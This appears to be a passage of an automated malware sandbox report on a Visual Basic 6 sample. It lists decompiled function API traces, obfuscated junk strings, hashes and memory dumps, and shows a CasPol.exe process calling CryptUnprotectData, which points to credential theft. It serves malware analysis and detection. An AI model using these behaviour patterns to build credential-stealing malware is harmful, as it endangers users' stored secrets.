                                                • Opcode ID: 2e3b3fc4fffb8605a70960c089c4cc66b22b087a906118c6ee55d07a0b76b279
                                                • Instruction ID: 57dffe05ca3c5da1a030023abcc7f88135f77959d75bc01245d1ac7c67f55578
                                                • Opcode Fuzzy Hash: 2e3b3fc4fffb8605a70960c089c4cc66b22b087a906118c6ee55d07a0b76b279
                                                • Instruction Fuzzy Hash: 6EB0122838C101FAE618CBF88D8142115C4D200BC13200C37FCC2E11D0C6FCCF408A2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0041F80D, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041F82B
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041F843
                                                • #593.MSVBVM60(0000000A), ref: 0041F875
                                                • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041F880
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,0000000A), ref: 0041F898
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 0041F8E5
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000D0), ref: 0041F92C
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C60,000000D0), ref: 0041F956
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000D0), ref: 0041F95E
                                                • #670.MSVBVM60(?,?,?,?,?,00401356), ref: 0041F967
                                                • __vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041F982
                                                • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0041F98E
                                                • __vbaNew2.MSVBVM60(00403258,00422010,00008008,?), ref: 0041F9B2
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F9EB
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000150), ref: 0041FA20
                                                • __vbaStrCat.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FA3C
                                                • __vbaStrMove.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041FA46
                                                • __vbaStrCat.MSVBVM60(?,00000000,cheve,?), ref: 0041FA4F
                                                • __vbaStrMove.MSVBVM60(?,00000000,cheve,?), ref: 0041FA59
                                                • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,cheve,?), ref: 0041FA68
                                                • __vbaFreeObj.MSVBVM60(?,?,00401356), ref: 0041FA73
                                                • #525.MSVBVM60(000000A9,?,?,00401356), ref: 0041FA7D
                                                • __vbaStrMove.MSVBVM60(000000A9,?,?,00401356), ref: 0041FA87
                                                • #610.MSVBVM60(?,00008008,?), ref: 0041FA90
                                                • #557.MSVBVM60(?,?,00008008,?), ref: 0041FA99
                                                • __vbaFreeVar.MSVBVM60(?,?,00008008,?), ref: 0041FAAF
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,00008008,?), ref: 0041FAD3
                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FB0C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000110), ref: 0041FB41
                                                • #515.MSVBVM60(?,00000008,000000BF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FB7F
                                                • __vbaStrVarMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FB88
                                                • __vbaStrMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FB92
                                                • __vbaFreeObj.MSVBVM60(?,?,00000008,000000BF), ref: 0041FB9A
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000BF), ref: 0041FBA9
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,?,?,00401356), ref: 0041FBC4
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 0041FC11
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000F8), ref: 0041FC58
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C60,000000F8), ref: 0041FC82
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000F8), ref: 0041FC8A
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,00008008,?), ref: 0041FCA2
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FCDB
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041FD10
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041FD3A
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C70,000000A0), ref: 0041FD42
                                                • __vbaFreeStr.MSVBVM60(0041FDBF), ref: 0041FD91
                                                • __vbaFreeStr.MSVBVM60(0041FDBF), ref: 0041FD99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$CheckHresult$New2$List$#515#525#557#593#610#670ChkstkCopy
                                                • String ID: cheve$skuddermudderets
                                                • API String ID: 4055753005-3782447816
                                                • Opcode ID: 2ffc7ad193b3ce5eb74f161c56c36c4ada5ac81719f343e742de174b9ce98664
                                                • Instruction ID: 315b26f1b20ea71efec0e826169b48a51f2d266b0a8051a88ddf78a5471f4783
                                                • Opcode Fuzzy Hash: 2ffc7ad193b3ce5eb74f161c56c36c4ada5ac81719f343e742de174b9ce98664
                                                • Instruction Fuzzy Hash: E7F1F871900218AFDB10EFA5DD45BDDBBB4BF44304F20017AE506BB2A2DB785A89DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004200CA, Relevance: 87.8, APIs: 41, Strings: 9, Instructions: 340COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 004200E8
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 00420119
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 00420131
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0042016A
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000160), ref: 004201B4
                                                • #575.MSVBVM60(?,00000009), ref: 004201ED
                                                • __vbaVarTstNe.MSVBVM60(00008008,?,?,00000009), ref: 0042020E
                                                • __vbaFreeObj.MSVBVM60(00008008,?,?,00000009), ref: 0042021D
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000009,?,00008008,?,?,00000009), ref: 0042022C
                                                • __vbaOnError.MSVBVM60(00000000,?,?,00401356), ref: 00420241
                                                • __vbaPrintObj.MSVBVM60(00403D30,00000000,?,00000000,?,?,00401356), ref: 00420252
                                                • #651.MSVBVM60(00000002), ref: 0042026C
                                                • __vbaStrMove.MSVBVM60(00000002), ref: 00420276
                                                • __vbaStrCmp.MSVBVM60(Rerefief,00000000,00000002), ref: 00420281
                                                • __vbaFreeStr.MSVBVM60(Rerefief,00000000,00000002), ref: 00420297
                                                • __vbaFreeVar.MSVBVM60(Rerefief,00000000,00000002), ref: 0042029F
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,Rerefief,00000000,00000002), ref: 004202C6
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 00420328
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 00420387
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,000000C8), ref: 004203A9
                                                • #690.MSVBVM60(bedrageriets,Azulmic,Regular6,HOLLO), ref: 004203C2
                                                • #685.MSVBVM60(Rerefief,00000000,00000002), ref: 004203C7
                                                • __vbaObjSet.MSVBVM60(?,00000000,Rerefief,00000000,00000002), ref: 004203D1
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403FC4,0000001C), ref: 00420418
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403FC4,0000001C), ref: 00420447
                                                • __vbaStrCat.MSVBVM60(Verdantly,bopl), ref: 00420465
                                                • __vbaStrMove.MSVBVM60(Verdantly,bopl), ref: 0042046F
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,Verdantly,bopl), ref: 00420487
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 004204E9
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000140), ref: 00420548
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,00000140), ref: 0042056A
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 00420582
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004205BB
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000100), ref: 00420605
                                                • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00420624
                                                • __vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401356), ref: 0042062D
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042063F
                                                • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042064A
                                                • __vbaFreeStr.MSVBVM60(004206A0,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042068A
                                                • __vbaFreeStr.MSVBVM60(004206A0,?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420692
                                                • __vbaFreeVar.MSVBVM60(004206A0,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042069A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresult$New2$ListMove$#575#651#685#690CallChkstkCopyErrorLatePrint
                                                • String ID: 08$Azulmic$DADAP$HOLLO$Regular6$Rerefief$Verdantly$bedrageriets$bopl
                                                • API String ID: 2545346589-1508429672
                                                • Opcode ID: 51cd7fa064726b393149679b360e02d76e304bd6d8d70c9679511ffcc752e46a
                                                • Instruction ID: 5d2b759578de80e5466735d9589726b778543c4d0ac7f900fba532ed706d053b
                                                • Opcode Fuzzy Hash: 51cd7fa064726b393149679b360e02d76e304bd6d8d70c9679511ffcc752e46a
                                                • Instruction Fuzzy Hash: 2CF1F970A00228AFDB10EFA1DD46FDDB7B4BF04305F5040AAE509B72A2DB785A85DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004206C7, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 004206E2
                                                • __vbaVarDup.MSVBVM60 ref: 00420708
                                                • #607.MSVBVM60(?,00000058,?), ref: 00420717
                                                • __vbaStrVarMove.MSVBVM60(?,?,00000058,?), ref: 00420720
                                                • __vbaStrMove.MSVBVM60(?,?,00000058,?), ref: 0042072A
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00000058,?), ref: 00420739
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 00420754
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420781
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000158), ref: 004207B6
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 004207DD
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00420816
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000000E8), ref: 0042084B
                                                • #517.MSVBVM60(?), ref: 00420862
                                                • __vbaStrMove.MSVBVM60(?), ref: 0042086C
                                                • __vbaStrCmp.MSVBVM60(?,00000000,?), ref: 00420875
                                                • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?), ref: 00420895
                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004208A7
                                                • __vbaVarDup.MSVBVM60 ref: 004208CF
                                                • #522.MSVBVM60(?,?), ref: 004208DC
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 004208E5
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 004208EF
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 004208FE
                                                • __vbaVarDup.MSVBVM60 ref: 0042091A
                                                • #520.MSVBVM60(?,?), ref: 00420927
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420930
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 0042093A
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00420949
                                                • #535.MSVBVM60 ref: 00420951
                                                • __vbaFreeStr.MSVBVM60(004209B5), ref: 0042099F
                                                • __vbaFreeStr.MSVBVM60(004209B5), ref: 004209A7
                                                • __vbaFreeStr.MSVBVM60(004209B5), ref: 004209AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$List$CheckHresultNew2$#517#520#522#535#607Chkstk
                                                • String ID: Subreptitiously$anoperineal
                                                • API String ID: 3004089779-3635317160
                                                • Opcode ID: abff8373e9afd2e3d79388dd18e22cf9a8b84d1cbaf0a54abf2f798d6bc156a8
                                                • Instruction ID: b7214f75807ebe57d7f80a30b2dbfb74e3b3aff90c36beef9a21fb464e5a0890
                                                • Opcode Fuzzy Hash: abff8373e9afd2e3d79388dd18e22cf9a8b84d1cbaf0a54abf2f798d6bc156a8
                                                • Instruction Fuzzy Hash: 3181EC71900218ABDB00EBE1DD46EDDB7B8AF44304F60447AE106BB1A1EB786A49CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041EDC2, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041EDDF
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 0041EE04
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EE3D
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,00000168), ref: 0041EE72
                                                • #652.MSVBVM60(?,00000002), ref: 0041EE9D
                                                • __vbaVarTstEq.MSVBVM60(00008008,?,?,00000002), ref: 0041EEB8
                                                • __vbaFreeObj.MSVBVM60(00008008,?,?,00000002), ref: 0041EEC7
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?,?,00000002), ref: 0041EED6
                                                • __vbaNew2.MSVBVM60(00403258,00422010), ref: 0041EF00
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041EF39
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C70,000001B8), ref: 0041EF6E
                                                • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041EF8D
                                                • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041EF96
                                                • __vbaStrMove.MSVBVM60(00000000), ref: 0041EFA0
                                                • #517.MSVBVM60(00000000,00000000), ref: 0041EFA6
                                                • __vbaStrMove.MSVBVM60(00000000,00000000), ref: 0041EFB0
                                                • __vbaFreeStr.MSVBVM60(00000000,00000000), ref: 0041EFB8
                                                • __vbaFreeObjList.MSVBVM60(00000002,00000000,00000000,00000000,00000000), ref: 0041EFC7
                                                • __vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 0041EFD2
                                                • __vbaVarDup.MSVBVM60 ref: 0041EFEB
                                                • #528.MSVBVM60(?,?), ref: 0041EFF8
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F001
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041F00B
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F01A
                                                • __vbaFreeStr.MSVBVM60(0041F06B), ref: 0041F05D
                                                • __vbaFreeStr.MSVBVM60(0041F06B), ref: 0041F065
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$List$CheckHresultNew2$#517#528#652CallChkstkLate
                                                • String ID: Apollo$fraena
                                                • API String ID: 1415655392-2588804562
                                                • Opcode ID: 5a9a36a42d2aa48e4e5d51d763b033799fc78508a814d3a612f69c50e02be6c4
                                                • Instruction ID: dc7c2892b89daed48e86a5197e0f3a07db2e3882d6e8a08117e229a0aac1cc58
                                                • Opcode Fuzzy Hash: 5a9a36a42d2aa48e4e5d51d763b033799fc78508a814d3a612f69c50e02be6c4
                                                • Instruction Fuzzy Hash: A8710B71D00218ABDB10EFA1CD46FDDB7B9AF48304F20416AE506B71A2DB795A45CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041FDDA, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 174COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041FDF8
                                                • __vbaNew2.MSVBVM60(00403258,00422010,?,?,?,?,00401356), ref: 0041FE23
                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FE5C
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000070), ref: 0041FE94
                                                • #714.MSVBVM60(?,00000004,00000000), ref: 0041FEBF
                                                • __vbaVarTstGt.MSVBVM60(00008003,?,?,00000004,00000000), ref: 0041FEDA
                                                • __vbaFreeObj.MSVBVM60(00008003,?,?,00000004,00000000), ref: 0041FEE9
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,00008003,?,?,00000004,00000000), ref: 0041FEF8
                                                • __vbaVarDup.MSVBVM60 ref: 0041FF23
                                                • #518.MSVBVM60(?,?), ref: 0041FF30
                                                • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FF39
                                                • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041FF43
                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FF52
                                                • __vbaNew2.MSVBVM60(00403C50,004223FC,?,?,?,?,?,00401356), ref: 0041FF6D
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C40,00000014), ref: 0041FFC3
                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C60,00000060), ref: 00420019
                                                • __vbaStrMove.MSVBVM60(00000000,?,00403C60,00000060), ref: 00420043
                                                • __vbaFreeObj.MSVBVM60(00000000,?,00403C60,00000060), ref: 0042004B
                                                • __vbaStrCopy.MSVBVM60(?,?,00401356), ref: 00420058
                                                • __vbaFreeStr.MSVBVM60(004200AF,?,?,00401356), ref: 004200A1
                                                • __vbaFreeStr.MSVBVM60(004200AF,?,?,00401356), ref: 004200A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$CheckHresultMove$ListNew2$#518#714ChkstkCopy
                                                • String ID: Frigrelsesmidlerne5$SVIRREFLUERS
                                                • API String ID: 33727100-1709780716
                                                • Opcode ID: 65580536397786fa706bb8d51fc4c4b9c69bd1a5c5f45537666c7d3ec1fda212
                                                • Instruction ID: 05d67103dbb05add12a6ebea6c7a7dada54bc5800d2f0557c61d9139718f6746
                                                • Opcode Fuzzy Hash: 65580536397786fa706bb8d51fc4c4b9c69bd1a5c5f45537666c7d3ec1fda212
                                                • Instruction Fuzzy Hash: 9571E971E00218AFDB10EFA5DC85BDDBBB8BF04304F5040AAE145B71A1DB785A89DF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004209C8, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 004209E4
                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 00420A11
                                                • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A3E
                                                • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A48
                                                • __vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A50
                                                • #610.MSVBVM60(00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A60
                                                • #553.MSVBVM60(?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A6D
                                                • __vbaVarTstEq.MSVBVM60(00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420A88
                                                • __vbaFreeVarList.MSVBVM60(00000002,00000006,?,00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE), ref: 00420A9B
                                                • __vbaOnError.MSVBVM60(000000FF,?,?,00401356), ref: 00420AB4
                                                • #578.MSVBVM60(trinovantes,000000FF,?,?,00401356), ref: 00420AC5
                                                • #526.MSVBVM60(?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420ADD
                                                • __vbaStrVarMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420AE6
                                                • __vbaStrMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420AF0
                                                • __vbaFreeVar.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420AF8
                                                • #615.MSVBVM60(?,?,00401356), ref: 00420B04
                                                • __vbaFreeStr.MSVBVM60(00420B50), ref: 00420B3A
                                                • __vbaFreeStr.MSVBVM60(00420B50), ref: 00420B42
                                                • __vbaFreeStr.MSVBVM60(00420B50), ref: 00420B4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$Free$Move$#526#553#578#610#615#703ChkstkCopyErrorList
                                                • String ID: Gg$trinovantes
                                                • API String ID: 2274906189-1238276640
                                                • Opcode ID: cf247fc3c615615351554742300d278c9f189135e562f7d3cd2d8d33885b8c33
                                                • Instruction ID: fa3f051dad1664e007856c5d2cd7fb7c94118a2c626e9f021893e604d1b54bc4
                                                • Opcode Fuzzy Hash: cf247fc3c615615351554742300d278c9f189135e562f7d3cd2d8d33885b8c33
                                                • Instruction Fuzzy Hash: 5C410FB1C0020CAADB10EFE5C946BDEBBB8AF44718F60416AF1117B1E1EB785649CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041F5CC, Relevance: 15.2, APIs: 10, Instructions: 183COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,00401356), ref: 0041F5E8
                                                • #582.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F617
                                                • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F61C
                                                • #539.MSVBVM60(00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F63D
                                                • __vbaStrVarMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F646
                                                • __vbaStrMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F650
                                                • __vbaFreeVar.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041F658
                                                • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000010,00000000,00000036,00000036,00000050,00000036,00000091), ref: 0041F670
                                                • __vbaFreeStr.MSVBVM60(0041F7E6), ref: 0041F7D5
                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041F7E6), ref: 0041F7E0
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __vba$FreeMove$#539#582ChkstkDestructRedim
                                                • String ID:
                                                • API String ID: 1927214042-0
                                                • Opcode ID: ecfeb1372e2a244c245e5f84989e9f2fad5d311815e6dbaf564962c96ae7d471
                                                • Instruction ID: 3caee3d0d8d5e66e53d3b6daa40e5a27e97e8b6e0f5a1226c7606ecdc7ec3b14
                                                • Opcode Fuzzy Hash: ecfeb1372e2a244c245e5f84989e9f2fad5d311815e6dbaf564962c96ae7d471
                                                • Instruction Fuzzy Hash: 46812175A101459FDB19DFA8D985F6ABBB0EB09710F06818AFD509F3E2C778E442CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004212B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • __vbaChkstk.MSVBVM60(?,004210BE,?,?,?,?,00401356), ref: 004212BE
                                                • #644.MSVBVM60(?,?,004210BE,?,?,?,?,00401356), ref: 004212E8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.10210614875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000001.00000002.10210588506.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210815794.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.10210843634.0000000000424000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: #644Chkstk__vba
                                                • String ID: ha
                                                • API String ID: 3537395942-1939875069
                                                • Opcode ID: 2c976db3d7b882820beba88f1cccbde965464f72214d83ac647b43158d10d725
                                                • Instruction ID: 55f39d54ae3e600ff5c48cfd089e1e8e11abb8126e3a43a06374aa452dded26c
                                                • Opcode Fuzzy Hash: 2c976db3d7b882820beba88f1cccbde965464f72214d83ac647b43158d10d725
                                                • Instruction Fuzzy Hash: 3BF0E539202741B9C7387B64AF1269ABB78EF0A750F50006AFB01AF2B1D3B05942E75C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: CasPol.exe PID: 376 Parent PID: 408 CasPol.exeCOMMON

                                                Executed Functions

                                                Function 01283A50, Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: ?H+#$?H+#$\Vl
                                                • API String ID: 0-3744373833
                                                • Opcode ID: 4c16210ee5d9737f011837fb7f0fb208c2c44ea54309697b7bae301c30eb37ae
                                                • Instruction ID: 9a987de299067d5d054d50016b59af3ea64e6286e07b25383268d4c8eee645a6
                                                • Opcode Fuzzy Hash: 4c16210ee5d9737f011837fb7f0fb208c2c44ea54309697b7bae301c30eb37ae
                                                • Instruction Fuzzy Hash: 8AB19B70E112098FDF14DFA9C8957EEBBF2BF88B14F148529D905AB290EB74D845CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01705220, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 017058D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14843202509.0000000001700000.00000040.00000010.sdmp, Offset: 01700000, based on PE: false
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID: ?H+#
                                                • API String ID: 834300711-596797320
                                                • Opcode ID: 5c64746954a007ef365742e46f22399f744c44d8dc6974197fbea0a2f575722e
